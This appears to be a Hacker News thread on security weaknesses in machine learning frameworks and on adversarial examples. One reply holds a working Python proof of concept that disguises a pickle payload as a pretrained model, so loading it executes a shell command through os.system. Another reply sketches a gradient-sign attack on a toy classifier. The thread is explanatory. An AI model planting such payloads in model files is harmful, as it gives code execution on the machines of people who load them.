
Ask HN: Vulnerabilities in ML frameworks - rs86
Does anyone know of any vulnerabilities in machine learning frameworks, especially buffer overflows and arbitrary code execution?
======
k4ch0w
Well, that's a really broad question. It's quite possible such vulnerabilities already exist in these frameworks and a security researcher just hasn't discovered them yet. If you're referring to a framework written in C/C++, then yes, a buffer overflow is possible. Hopefully, though, modern protections such as ASLR, CFG, CFI, etc. protect you. I'll refer you to an old classic,
[http://insecure.org/stf/smashstack.html](http://insecure.org/stf/smashstack.html),
though that attack is very hard to pull off today. Modern compilers are pretty good at keeping developers from shooting themselves in the foot. <3 clang's memory sanitizer.

Arbitrary code execution is more plausible IMO. A lot of ML models are stored as serialized files using something like pickle or Java's serialization. Theoretically, you could embed code in a pretrained model file that executes arbitrary code when someone loads it. This could be done with a simple technique like a code cave:
[https://en.wikipedia.org/wiki/Code_cave](https://en.wikipedia.org/wiki/Code_cave).
I haven't had time to dig into this myself, but I honestly don't think it would be hard.
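
To make the pickle case concrete, here's a minimal sketch in Python (the class name, file name, and command are made up for illustration; pickle is just the standard library module):

```python
import os
import pickle


class MaliciousModel:
    """Pretends to be a saved model, but runs a command when unpickled."""

    def __reduce__(self):
        # pickle.load() will call os.system("echo pwned") while
        # deserializing, i.e. before the victim's code even looks at
        # the "model" it got back.
        return (os.system, ("echo pwned",))


# Attacker side: serialize the payload and ship it as a "pretrained model".
with open("model.pkl", "wb") as f:
    pickle.dump(MaliciousModel(), f)

# Victim side: "load the pretrained model" -- the command runs right here.
with open("model.pkl", "rb") as f:
    model = pickle.load(f)
```

This is exactly why the pickle docs warn against unpickling data from untrusted sources.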

I think in the next couple of years you will see more vulnerabilities pop up in these frameworks, but finding security vulnerabilities takes time.

~~~
rs86
Yes, that's the kind of attack I'm interested in, since most deep learning libraries are written in C++. I think model inference and estimation will be deployed widely on mobile phones and desktops, and they may become an important attack vector since they do heavy computation over complex data structures with a lot of memory allocation.

------
mgliwka
There's also a different kind of attack: fooling a model into recognizing things as something they aren't:

[https://media.ccc.de/v/34c3-8860-deep_learning_blindspots](https://media.ccc.de/v/34c3-8860-deep_learning_blindspots)

[https://medium.com/@ageitgey/machine-learning-is-fun-part-8-...](https://medium.com/@ageitgey/machine-learning-is-fun-part-8-how-to-intentionally-trick-neural-networks-b55da32b7196)
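
For a feel of the mechanics, here's a minimal numpy sketch of a fast-gradient-sign-style perturbation against a toy logistic-regression "model" (everything here is illustrative and far simpler than the real attacks in the links above):

```python
import numpy as np

rng = np.random.default_rng(0)

# Toy "model": fixed logistic-regression weights, p(y=1|x) = sigmoid(w.x + b).
w = rng.normal(size=10)
b = 0.1

def sigmoid(z):
    return 1.0 / (1.0 + np.exp(-z))

def predict(x):
    return sigmoid(w @ x + b)

# Some input and the label we treat as correct for it.
x = rng.normal(size=10)
y = 1.0

# Gradient of the cross-entropy loss w.r.t. the *input* is (p - y) * w.
p = predict(x)
grad_x = (p - y) * w

# Fast Gradient Sign Method: nudge every feature slightly in the direction
# that increases the loss; the prediction moves away from the label.
epsilon = 0.25
x_adv = x + epsilon * np.sign(grad_x)

print("original prediction:   ", predict(x))
print("adversarial prediction:", predict(x_adv))
```

The same idea, applied to a deep network's input gradient, is what produces the imperceptible image perturbations shown in the talk.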

~~~
Tiki
People building automated-vehicle algorithms must have their hands full; I can't even begin to think how you'd wrangle the amount of noise that exists in the real world. Then you have to imagine all the ways a system can be exploited through the very things it's supposed to do. How does it handle a roadside advertisement with a stop sign on it? A cardboard cutout of a person next to the road? All the reflective materials and their individual properties? I know a lot of it is radar-based, so it's not just image processing, but I can imagine plenty of ways that could be fooled and go wrong as well.

~~~
stevew20
See relevant XKCD: [https://xkcd.com/1958/](https://xkcd.com/1958/)

I believe that most ML applications are fool-able by attacks of the same type
as would fool a human doing the same task as the ML. The really big difference
is the scale of attack required to fool ML vs a human.

For example, let's consider ML processing of camera+lidar data, similar to
Google's self driving system, versus a cardboard cut-out of a puppy in the
road. A human could be fooled by a really elaborate cardboard cut-out, or one
viewed at a high speed. ML is likely to be fooled by a cut-out as well, but
the elaborateness required of the cut-out would likely be lower (people would
notice it doesn't look normal, while the ML has a much smaller dataset than
the average person, and hasn't focused on cute furry puppies as much). The ML would also likely be much better at dealing with high speeds than a human would be, because we don't have built-in lidars and our brains work orders of magnitude slower; but taken to an extreme (the ML can't complete processing in time to identify the fake), the ML would not be able to tell the difference.

There are certainly other ways to go about it, but I think this is the most straightforward and general 'attack', in that false positives are unavoidable
in ML (and in humans).

------
joshumax
I don't know if this counts, since your question is rather vague, but I wrote
an article a while back about how Torch creates certain vulnerabilities on
local systems:
[https://joshumax.github.io/general/2017/06/08/how-torch-brok...](https://joshumax.github.io/general/2017/06/08/how-torch-broke-ls.html)

------
ladberg
No, and if someone did, they would report it to the developers.

